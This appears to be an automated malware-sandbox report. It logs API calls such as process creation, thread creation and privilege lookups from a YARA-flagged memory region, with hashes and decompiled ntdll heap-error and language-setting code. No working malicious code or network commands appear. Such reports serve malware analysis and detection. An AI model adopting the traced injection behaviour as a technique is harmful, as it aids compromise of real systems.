                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 009B9BC2
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                              • Instruction ID: f152649cc95565e5af2c20a1f7bcabff8a3c6ef613b0eb9b23843f03bdd1c071
                                                              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                              • Instruction Fuzzy Hash: 7E011EB5D1020DABDB10DBE4ED46FDDB7789B54318F104199EA0897241F671EB14CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 009C89C4
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                              • Instruction ID: a05270623a173e8d73c61c50d0d5e8a6119f4090588d0b07cfa78e67b1b993ba
                                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                              • Instruction Fuzzy Hash: 0901AFB2214108AFCB54DF89DC85EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 009C89C4
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: a3fe5a88131dfa4474b2c41af1f8df4bcdb2176c78b5bf008fe4d947e9a6699b
                                                              • Instruction ID: 66038dbe47e5d9700d4306e1751d029b58c5bc140c3ef1dd3a48fcc45b4ede7b
                                                              • Opcode Fuzzy Hash: a3fe5a88131dfa4474b2c41af1f8df4bcdb2176c78b5bf008fe4d947e9a6699b
                                                              • Instruction Fuzzy Hash: 6B01B2B2200108BFCB54CF89DD84EEB37ADAF8C354F158258FA0DA7241C630E851CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,009BCD00,?,?), ref: 009C747C
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: 5266fbbeb4fe07c697b4a55a595f6c8ba9a7d821648a3fcb8f22f015eb9a36f6
                                                              • Instruction ID: 87dcf7be430fd46285a13ec98cee0a6627388ddcecc586da84150bc13638189a
                                                              • Opcode Fuzzy Hash: 5266fbbeb4fe07c697b4a55a595f6c8ba9a7d821648a3fcb8f22f015eb9a36f6
                                                              • Instruction Fuzzy Hash: C8F0E5727842643AD33125A88C03FA77A9CCBD1B10F148139FA4DEB2C2D591F90283D5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,009BCD00,?,?), ref: 009C747C
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: 8e7047a9cb8df936ba72e981128d582d5b245ee00216b9e7364ec18dfb279628
                                                              • Instruction ID: 95dc9b6653993956a2b072d770791bbd66e580bab0f9de4821e640fadad7ff37
                                                              • Opcode Fuzzy Hash: 8e7047a9cb8df936ba72e981128d582d5b245ee00216b9e7364ec18dfb279628
                                                              • Instruction Fuzzy Hash: 06E06D737812183AE22065A99C02FA7B29CCB81B60F14402AFA0DEB2C1D595F90142A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 009C89C4
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: 69a68fe33171a6abe7a4b82f168d536fa2d298c87b92f7041faaf0d87c2a7689
                                                              • Instruction ID: f578db1176a06713333271c7576346ddf784b7c043f7d8510585bda343683e77
                                                              • Opcode Fuzzy Hash: 69a68fe33171a6abe7a4b82f168d536fa2d298c87b92f7041faaf0d87c2a7689
                                                              • Instruction Fuzzy Hash: B4F0FEB2204508AB8B08CF9DE8C0CEB73B9EF9C254B11861DF91D87244C630EC568FA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(009C3546,?,009C3CBF,009C3CBF,?,009C3546,?,?,?,?,?,00000000,00000000,?), ref: 009C88ED
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                              • Instruction ID: c5e0fef52317685bde74357eb92be1792214e3e9d8e46abbc76aa16b145fd9d1
                                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                              • Instruction Fuzzy Hash: B0E012B1200208ABDB14EF99CC85EA777ACAF88750F158558BE085B242C630F910CBB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,009BCFD2,009BCFD2,?,00000000,?,?), ref: 009C8A90
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                              • Instruction ID: f86a942eaece0d4b78fa9876149aa36c22f877b88e4136b2deb98a3f21f9464f
                                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                              • Instruction Fuzzy Hash: E1E01AB1600208ABDB10DF49CC85FE737ADAF89750F018154BE0857242C930F8108BF5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,?,009B7C93,?), ref: 009BD46B
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                              • Instruction ID: 6c6bbe462396232eb3543801fb794e4fe5e0c4a9498ef087beb0596c3172ad96
                                                              • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                              • Instruction Fuzzy Hash: B1D0A7717503083BE610FAA89C03F6632CD5B44B10F498064F94DD73C3E960F5004161
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 0231d820ddc28237a743f818f011beb33deccdde3d07fea159bea001e7a7fb2b
                                                              • Instruction ID: b98f92faf314b027df27eb1c7d3d46f289821d567a706284f0d8ecb20c213443
                                                              • Opcode Fuzzy Hash: 0231d820ddc28237a743f818f011beb33deccdde3d07fea159bea001e7a7fb2b
                                                              • Instruction Fuzzy Hash: FFB09BB29014C5C5F715D7714A087377904F7D0745F16C0D5D1020655A4778D491F6B5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Strings
                                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04C4B3D6
                                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04C4B476
                                                              • *** enter .exr %p for the exception record, xrefs: 04C4B4F1
                                                              • a NULL pointer, xrefs: 04C4B4E0
                                                              • The instruction at %p tried to %s , xrefs: 04C4B4B6
                                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04C4B53F
                                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 04C4B2F3
                                                              • The resource is owned shared by %d threads, xrefs: 04C4B37E
                                                              • This failed because of error %Ix., xrefs: 04C4B446
                                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 04C4B352
                                                              • Go determine why that thread has not released the critical section., xrefs: 04C4B3C5
                                                              • <unknown>, xrefs: 04C4B27E, 04C4B2D1, 04C4B350, 04C4B399, 04C4B417, 04C4B48E
                                                              • an invalid address, %p, xrefs: 04C4B4CF
                                                              • *** then kb to get the faulting stack, xrefs: 04C4B51C
                                                              • The instruction at %p referenced memory at %p., xrefs: 04C4B432
                                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04C4B323
                                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04C4B484
                                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 04C4B39B
                                                              • write to, xrefs: 04C4B4A6
                                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04C4B2DC
                                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04C4B305
                                                              • *** enter .cxr %p for the context, xrefs: 04C4B50D
                                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04C4B47D
                                                              • The resource is owned exclusively by thread %p, xrefs: 04C4B374
                                                              • *** Inpage error in %ws:%s, xrefs: 04C4B418
                                                              • *** An Access Violation occurred in %ws:%s, xrefs: 04C4B48F
                                                              • The critical section is owned by thread %p., xrefs: 04C4B3B9
                                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04C4B38F
                                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04C4B314
                                                              • read from, xrefs: 04C4B4AD, 04C4B4B2
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                              • API String ID: 0-108210295
                                                              • Opcode ID: 6415d3be2a9be81f555f7549fec5aeda3a0b77ce09fd3a8ad233694ca8de9b7c
                                                              • Instruction ID: 3e457df2188a87d1cc78968e3cc540639175ca21a366a28f32fa6e9282a38ca6
                                                              • Opcode Fuzzy Hash: 6415d3be2a9be81f555f7549fec5aeda3a0b77ce09fd3a8ad233694ca8de9b7c
                                                              • Instruction Fuzzy Hash: BB810435A40210FFEB216A06CE45E7B3B2BEF86B55F044089F1046B162F6A1F911EB72
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 44%
                                                              			E04C51C06() {
                                                              				signed int _t27;
                                                              				char* _t104;
                                                              				char* _t105;
                                                              				intOrPtr _t113;
                                                              				intOrPtr _t115;
                                                              				intOrPtr _t117;
                                                              				intOrPtr _t119;
                                                              				intOrPtr _t120;
                                                              
                                                              				_t105 = 0x4b748a4;
                                                              				_t104 = "HEAP: ";
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              					_push(_t104);
                                                              					E04B9B150();
                                                              				} else {
                                                              					E04B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              				}
                                                              				_push( *0x4c8589c);
                                                              				E04B9B150("Heap error detected at %p (heap handle %p)\n",  *0x4c858a0);
                                                              				_t27 =  *0x4c85898; // 0x0
                                                              				if(_t27 <= 0xf) {
                                                              					switch( *((intOrPtr*)(_t27 * 4 +  &M04C51E96))) {
                                                              						case 0:
                                                              							_t105 = "heap_failure_internal";
                                                              							goto L21;
                                                              						case 1:
                                                              							goto L21;
                                                              						case 2:
                                                              							goto L21;
                                                              						case 3:
                                                              							goto L21;
                                                              						case 4:
                                                              							goto L21;
                                                              						case 5:
                                                              							goto L21;
                                                              						case 6:
                                                              							goto L21;
                                                              						case 7:
                                                              							goto L21;
                                                              						case 8:
                                                              							goto L21;
                                                              						case 9:
                                                              							goto L21;
                                                              						case 0xa:
                                                              							goto L21;
                                                              						case 0xb:
                                                              							goto L21;
                                                              						case 0xc:
                                                              							goto L21;
                                                              						case 0xd:
                                                              							goto L21;
                                                              						case 0xe:
                                                              							goto L21;
                                                              						case 0xf:
                                                              							goto L21;
                                                              					}
                                                              				}
                                                              				L21:
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              					_push(_t104);
                                                              					E04B9B150();
                                                              				} else {
                                                              					E04B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              				}
                                                              				_push(_t105);
                                                              				E04B9B150("Error code: %d - %s\n",  *0x4c85898);
                                                              				_t113 =  *0x4c858a4; // 0x0
                                                              				if(_t113 != 0) {
                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              						_push(_t104);
                                                              						E04B9B150();
                                                              					} else {
                                                              						E04B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              					}
                                                              					E04B9B150("Parameter1: %p\n",  *0x4c858a4);
                                                              				}
                                                              				_t115 =  *0x4c858a8; // 0x0
                                                              				if(_t115 != 0) {
                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              						_push(_t104);
                                                              						E04B9B150();
                                                              					} else {
                                                              						E04B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              					}
                                                              					E04B9B150("Parameter2: %p\n",  *0x4c858a8);
                                                              				}
                                                              				_t117 =  *0x4c858ac; // 0x0
                                                              				if(_t117 != 0) {
                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              						_push(_t104);
                                                              						E04B9B150();
                                                              					} else {
                                                              						E04B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              					}
                                                              					E04B9B150("Parameter3: %p\n",  *0x4c858ac);
                                                              				}
                                                              				_t119 =  *0x4c858b0; // 0x0
                                                              				if(_t119 != 0) {
                                                              					L41:
                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              						_push(_t104);
                                                              						E04B9B150();
                                                              					} else {
                                                              						E04B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              					}
                                                              					_push( *0x4c858b4);
                                                              					E04B9B150("Last known valid blocks: before - %p, after - %p\n",  *0x4c858b0);
                                                              				} else {
                                                              					_t120 =  *0x4c858b4; // 0x0
                                                              					if(_t120 != 0) {
                                                              						goto L41;
                                                              					}
                                                              				}
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              					_push(_t104);
                                                              					E04B9B150();
                                                              				} else {
                                                              					E04B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              				}
                                                              				return E04B9B150("Stack trace available at %p\n", 0x4c858c0);
                                                              			}











                                                              0x04c51c10
                                                              0x04c51c16
                                                              0x04c51c1e
                                                              0x04c51c3d
                                                              0x04c51c3e
                                                              0x04c51c20
                                                              0x04c51c35
                                                              0x04c51c3a
                                                              0x04c51c44
                                                              0x04c51c55
                                                              0x04c51c5a
                                                              0x04c51c65
                                                              0x04c51c67
                                                              0x00000000
                                                              0x04c51c6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04c51c67
                                                              0x04c51cdc
                                                              0x04c51ce5
                                                              0x04c51d04
                                                              0x04c51d05
                                                              0x04c51ce7
                                                              0x04c51cfc
                                                              0x04c51d01
                                                              0x04c51d0b
                                                              0x04c51d17
                                                              0x04c51d1f
                                                              0x04c51d25
                                                              0x04c51d30
                                                              0x04c51d4f
                                                              0x04c51d50
                                                              0x04c51d32
                                                              0x04c51d47
                                                              0x04c51d4c
                                                              0x04c51d61
                                                              0x04c51d67
                                                              0x04c51d68
                                                              0x04c51d6e
                                                              0x04c51d79
                                                              0x04c51d98
                                                              0x04c51d99
                                                              0x04c51d7b
                                                              0x04c51d90
                                                              0x04c51d95
                                                              0x04c51daa
                                                              0x04c51db0
                                                              0x04c51db1
                                                              0x04c51db7
                                                              0x04c51dc2
                                                              0x04c51de1
                                                              0x04c51de2
                                                              0x04c51dc4
                                                              0x04c51dd9
                                                              0x04c51dde
                                                              0x04c51df3
                                                              0x04c51df9
                                                              0x04c51dfa
                                                              0x04c51e00
                                                              0x04c51e0a
                                                              0x04c51e13
                                                              0x04c51e32
                                                              0x04c51e33
                                                              0x04c51e15
                                                              0x04c51e2a
                                                              0x04c51e2f
                                                              0x04c51e39
                                                              0x04c51e4a
                                                              0x04c51e02
                                                              0x04c51e02
                                                              0x04c51e08
                                                              0x00000000
                                                              0x00000000
                                                              0x04c51e08
                                                              0x04c51e5b
                                                              0x04c51e7a
                                                              0x04c51e7b
                                                              0x04c51e5d
                                                              0x04c51e72
                                                              0x04c51e77
                                                              0x04c51e95

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                              • API String ID: 0-2897834094
                                                              • Opcode ID: cc1ab9a2dd89cd625c728b711cb87cf15869fb63f57e30db809a6331577542c6
                                                              • Instruction ID: fbb0be522f16c4360e3ed87f2ee7ffdc74c7d3d12ba237a63f5b1fbb440a97a2
                                                              • Opcode Fuzzy Hash: cc1ab9a2dd89cd625c728b711cb87cf15869fb63f57e30db809a6331577542c6
                                                              • Instruction Fuzzy Hash: F761A637A65155EFE611AB45E448F2873E5FB05A3070D44BEF8099B231DAA5FC90CE0E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 96%
                                                              			E04BA3D34(signed int* __ecx) {
                                                              				signed int* _v8;
                                                              				char _v12;
                                                              				signed int* _v16;
                                                              				signed int* _v20;
                                                              				char _v24;
                                                              				signed int _v28;
                                                              				signed int _v32;
                                                              				char _v36;
                                                              				signed int _v40;
                                                              				signed int _v44;
                                                              				signed int* _v48;
                                                              				signed int* _v52;
                                                              				signed int _v56;
                                                              				signed int _v60;
                                                              				char _v68;
                                                              				signed int _t140;
                                                              				signed int _t161;
                                                              				signed int* _t236;
                                                              				signed int* _t242;
                                                              				signed int* _t243;
                                                              				signed int* _t244;
                                                              				signed int* _t245;
                                                              				signed int _t255;
                                                              				void* _t257;
                                                              				signed int _t260;
                                                              				void* _t262;
                                                              				signed int _t264;
                                                              				void* _t267;
                                                              				signed int _t275;
                                                              				signed int* _t276;
                                                              				short* _t277;
                                                              				signed int* _t278;
                                                              				signed int* _t279;
                                                              				signed int* _t280;
                                                              				short* _t281;
                                                              				signed int* _t282;
                                                              				short* _t283;
                                                              				signed int* _t284;
                                                              				void* _t285;
                                                              
                                                              				_v60 = _v60 | 0xffffffff;
                                                              				_t280 = 0;
                                                              				_t242 = __ecx;
                                                              				_v52 = __ecx;
                                                              				_v8 = 0;
                                                              				_v20 = 0;
                                                              				_v40 = 0;
                                                              				_v28 = 0;
                                                              				_v32 = 0;
                                                              				_v44 = 0;
                                                              				_v56 = 0;
                                                              				_t275 = 0;
                                                              				_v16 = 0;
                                                              				if(__ecx == 0) {
                                                              					_t280 = 0xc000000d;
                                                              					_t140 = 0;
                                                              					L50:
                                                              					 *_t242 =  *_t242 | 0x00000800;
                                                              					_t242[0x13] = _t140;
                                                              					_t242[0x16] = _v40;
                                                              					_t242[0x18] = _v28;
                                                              					_t242[0x14] = _v32;
                                                              					_t242[0x17] = _t275;
                                                              					_t242[0x15] = _v44;
                                                              					_t242[0x11] = _v56;
                                                              					_t242[0x12] = _v60;
                                                              					return _t280;
                                                              				}
                                                              				if(E04BA1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                              					_v56 = 1;
                                                              					if(_v8 != 0) {
                                                              						L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                              					}
                                                              					_v8 = _t280;
                                                              				}
                                                              				if(E04BA1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                              					_v60 =  *_v8;
                                                              					L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                              					_v8 = _t280;
                                                              				}
                                                              				if(E04BA1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                              					L16:
                                                              					if(E04BA1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                              						L28:
                                                              						if(E04BA1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                              							L46:
                                                              							_t275 = _v16;
                                                              							L47:
                                                              							_t161 = 0;
                                                              							L48:
                                                              							if(_v8 != 0) {
                                                              								L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                              							}
                                                              							_t140 = _v20;
                                                              							if(_t140 != 0) {
                                                              								if(_t275 != 0) {
                                                              									L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                              									_t275 = 0;
                                                              									_v28 = 0;
                                                              									_t140 = _v20;
                                                              								}
                                                              							}
                                                              							goto L50;
                                                              						}
                                                              						_t167 = _v12;
                                                              						_t255 = _v12 + 4;
                                                              						_v44 = _t255;
                                                              						if(_t255 == 0) {
                                                              							_t276 = _t280;
                                                              							_v32 = _t280;
                                                              						} else {
                                                              							_t276 = L04BB4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                              							_t167 = _v12;
                                                              							_v32 = _t276;
                                                              						}
                                                              						if(_t276 == 0) {
                                                              							_v44 = _t280;
                                                              							_t280 = 0xc0000017;
                                                              							goto L46;
                                                              						} else {
                                                              							E04BDF3E0(_t276, _v8, _t167);
                                                              							_v48 = _t276;
                                                              							_t277 = E04BE1370(_t276, 0x4b74e90);
                                                              							_pop(_t257);
                                                              							if(_t277 == 0) {
                                                              								L38:
                                                              								_t170 = _v48;
                                                              								if( *_v48 != 0) {
                                                              									E04BDBB40(0,  &_v68, _t170);
                                                              									if(L04BA43C0( &_v68,  &_v24) != 0) {
                                                              										_t280 =  &(_t280[0]);
                                                              									}
                                                              								}
                                                              								if(_t280 == 0) {
                                                              									_t280 = 0;
                                                              									L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                              									_v44 = 0;
                                                              									_v32 = 0;
                                                              								} else {
                                                              									_t280 = 0;
                                                              								}
                                                              								_t174 = _v8;
                                                              								if(_v8 != 0) {
                                                              									L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                              								}
                                                              								_v8 = _t280;
                                                              								goto L46;
                                                              							}
                                                              							_t243 = _v48;
                                                              							do {
                                                              								 *_t277 = 0;
                                                              								_t278 = _t277 + 2;
                                                              								E04BDBB40(_t257,  &_v68, _t243);
                                                              								if(L04BA43C0( &_v68,  &_v24) != 0) {
                                                              									_t280 =  &(_t280[0]);
                                                              								}
                                                              								_t243 = _t278;
                                                              								_t277 = E04BE1370(_t278, 0x4b74e90);
                                                              								_pop(_t257);
                                                              							} while (_t277 != 0);
                                                              							_v48 = _t243;
                                                              							_t242 = _v52;
                                                              							goto L38;
                                                              						}
                                                              					}
                                                              					_t191 = _v12;
                                                              					_t260 = _v12 + 4;
                                                              					_v28 = _t260;
                                                              					if(_t260 == 0) {
                                                              						_t275 = _t280;
                                                              						_v16 = _t280;
                                                              					} else {
                                                              						_t275 = L04BB4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                              						_t191 = _v12;
                                                              						_v16 = _t275;
                                                              					}
                                                              					if(_t275 == 0) {
                                                              						_v28 = _t280;
                                                              						_t280 = 0xc0000017;
                                                              						goto L47;
                                                              					} else {
                                                              						E04BDF3E0(_t275, _v8, _t191);
                                                              						_t285 = _t285 + 0xc;
                                                              						_v48 = _t275;
                                                              						_t279 = _t280;
                                                              						_t281 = E04BE1370(_v16, 0x4b74e90);
                                                              						_pop(_t262);
                                                              						if(_t281 != 0) {
                                                              							_t244 = _v48;
                                                              							do {
                                                              								 *_t281 = 0;
                                                              								_t282 = _t281 + 2;
                                                              								E04BDBB40(_t262,  &_v68, _t244);
                                                              								if(L04BA43C0( &_v68,  &_v24) != 0) {
                                                              									_t279 =  &(_t279[0]);
                                                              								}
